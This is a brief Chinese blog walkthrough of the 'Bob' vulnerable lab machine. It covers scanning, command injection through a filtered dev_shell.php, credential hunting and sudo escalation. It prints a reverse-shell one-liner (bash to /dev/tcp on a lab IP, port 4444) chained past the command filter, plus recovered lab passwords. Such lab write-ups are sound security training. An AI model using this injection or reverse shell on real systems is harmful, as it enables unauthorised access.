BOB靶机

于 2024-08-08 08:57:38 发布
阅读量277 收藏
点赞数 12
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74232792/article/details/141016939
版权

主机发现

目录端口扫描

查看robots文件

/dev_shell.php 接口可以执行命令,但会过滤某些命令,用命令拼接符拼接其他命令

whoami | pwd&echo "bash -i >& /dev/tcp/192.168.132.128/4444 0>&1" | bash kali监听4444

进行提权,bob的家目录下有一个密码文件和一个secret目录

得到两个用户的账号密码,还有一个加密文件

/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下有发现密钥,藏头诗 HARPOCRATES

读取加密文件,发现权限不够,ssh连接jc用户

读取到bob的密码

elliot 的家目录,发现一个 theadminisdumb.txt 文件 ,密码被改为theadminisdumb

ssh连接bob,b0bcat_

sudo su 提权,密码theadminisdumb

.南捱
关注
  • 12
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
PWN靶机环境 网络安全
05-23
PWN靶机环境
尚硅谷谷粒商城项目笔记——四、使用docker安装redis【电脑CPU:AMD】
B6665X的博客
08-06 332
尚硅谷谷粒商城项目笔记——四、使用docker安装redis【电脑CPU:AMD】
OpenStack Yoga版安装笔记(十二)nova安装(下)
zkyqss的博客
08-03 735
在不支持硬件加速的传统硬件上,可以使用通用的QEMU hypervisor。另外可以通过简单修改这里的配置,增加额外的计算节点,从而水平扩展计算环境。计算服务(Compute Service)支持多种hypervisor来部署实例或虚拟机。为了简化配置,这里使用。在安装和配置compute service之前,需要先创建数据库、服务凭证(用户名/密码)、服务API端点。1、检查计算节点(compute node)是否支持硬件虚拟化,返回1或者大于1,则支持;当您添加新的计算节点时,您必须在控制节点上运行。
网络安全自学笔记
2301_77160226的博客
08-07 588
网络安全是指保护网络系统中的硬件、软件及其数据不因偶然或恶意的原因而遭到破坏、更改、泄露,保障系统连续可靠正常地运行,网络服务不中断。网络安全涵盖了众多方面,包括但不限于保护个人隐私、防止商业机密泄露、维护国家安全等。在当今数字化时代,几乎所有的信息交流和业务活动都依赖于网络,因此网络安全的重要性日益凸显。通过搭建实验环境,如使用虚拟机搭建一个包含服务器和客户端的网络,模拟各种网络攻击和防护场景,如进行 SQL 注入攻击的尝试,并实施相应的防护措施,如安装防火墙、使用加密技术等。
RocketMQ5.0课笔记-主从设计,持久化
m0_61253599的博客
08-07 72
云原生存储持久化可以保存时间:几个月,甚至一年。
接口测试学习笔记1
weixin_53666393的博客
08-03 924
同时也像白盒测试那样,检查程序的代码,但这种检查不像白盒测试那样详细、完整,一般只对程序模块之间的调用、核心代码进行检查,在集成测试时经常采用,一般也是程序员大量采用。现在企业说的接口测试,一般指的是Web接口测试或Http接口测试,主要指的是基于B/S架构的接口测试(B/S架构主要基于HTTP 超文本传输协议,所以也叫HTTP接口测试)对请求对象(网页、文件、图片...)进行的操作,就是一些命令,程序员在编程的时候使用,在接口文档中会指明,测试人员测试接口的时候,按照说明选择正确的方法。
sheng的学习笔记-AI-k近邻学习(kNN)
coldstarry的专栏
08-07 232
k近邻(k-Nearest Neighbor,简称kNN)学习是一种常用的监督学习方法,是一种基本的分类与回归方法。分类问题:对新的样本,根据其 k 个最近邻的训练样本的类别,通过多数表决等方式进行预测。回归问题:对新的样本,根据其 k 个最近邻的训练样本标签值的均值作为预测值。
【Python学习笔记】序列化
m0_51496369的博客
08-05 660
序列化pickle、dataframe
C语言零基础学习笔记11——分支和循环(五)
Lbs_gemini0603的博客
08-02 1256
C语言零基础学习笔记11——分支和循环(五)
免杀笔记 ---> 函数踩踏 && PEB寻址
huohaowen的博客
08-03 667
又鸽了一段时间了,最近在写这个武器,感兴趣的师傅们可以去看看(顺便给我点个Star)::累死我了,点个Star吧那么言归正传,我们来讲今天的主题,函数踩踏 && PEB寻址。
谷粒商城实战笔记-139-商城业务-nginx-搭建域名访问环境一(反向代理配置)
epitomizelu的专栏
08-07 497
全局块包含影响Nginx全局的指令,如用户组、Nginx进程的PID文件存放路径、日志文件存放路径、配置文件引入、worker process数等。events块配置影响Nginx服务器或与用户的网络连接,例如每个进程的最大连接数、事件驱动模型处理连接请求、是否允许同时接受多个网络连接、开启多个网络连接序列化等。http块。
C++笔试练习笔记【6】:数组中两个字符串的最小距离
Q741_147的博客
08-06 135
1.我们定义两个变量用来存储下标,,两个变量默认值为-1因为如果strs里面没有str1或str2的时候返回-1,遇到对应查找的str1和str2更新变量如下图。备用:https://www.nowcoder.com/practice/2c6a0a8e1d20492f92941400036e0890。我的代码比较麻烦其实哈可以简化,其实可以不用数组储存,直接用一个string每读取一个字符串进行一次循环判断更好。我们可以用两层for循环暴力解法但是题目要求时间复杂度小于O(n)所以我们要想其他方法。
从零入门 AI for Science(AI+药物) 笔记 #Datawhale AI 夏令营
qq_23311271的博客
08-03 1511
从零入门 AI for Science(AI+药物) 笔记 #Datawhale AI 夏令营
MySQL笔记(十):MySQL管理
最新发布
SSuperwoman的博客
08-07 133
【代码】MySQL笔记(十):MySQL管理。
模型优化学习笔记—Adam算法
文盲青年的博客
08-05 297
假设动量梯度下降,可以在30个epoch能找到最小值,那么RMSprop能在20个epoch中找到,而Adam更厉害,因为它是动量梯度下降和RMSprop的结合体。: 虽然表面r没变,但是w=w-rdw,当dw变大,w变小,相当于r变大的效果。起到了与调整r的同样的作用:改变了梯度下降在某个方向的学习速度。超参数:r、k1、k2,一般k1和k2取0.9和0.999且很少改变。3、梯度下降(其中sqrt表示开平方,u取10^(-8) ),算出指数加权移动平均,即动量梯度下降。,修正动量梯度下降的值。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值